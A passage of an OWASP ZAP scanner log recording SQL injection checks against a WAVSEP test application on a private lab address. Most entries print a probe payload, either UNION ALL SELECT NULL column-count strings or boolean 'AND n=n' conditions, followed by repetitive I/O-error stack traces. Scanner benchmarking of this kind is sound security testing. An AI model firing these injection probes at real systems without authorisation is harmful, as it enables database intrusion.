org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680481 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680482 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680483 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680484 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680484 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680485 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680485 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9680596 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7636=2333 AND (8296=8296] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7636=2333 AND (8296=8296 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680596 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 2975=2401 AND (2542=2542] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 2975=2401 AND (2542=2542 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680597 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 1885=1885 AND (3233=3233] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 1885=1885 AND (3233=3233 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680598 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 2747=2747 AND (3519=3519] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 2747=2747 AND (3519=3519 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680598 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 2975=2401 AND (2542=2542] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 2975=2401 AND (2542=2542 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680599 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7636=2333 AND (8296=8296] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7636=2333 AND (8296=8296 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680600 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7107=8076] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7107=8076 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680601 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 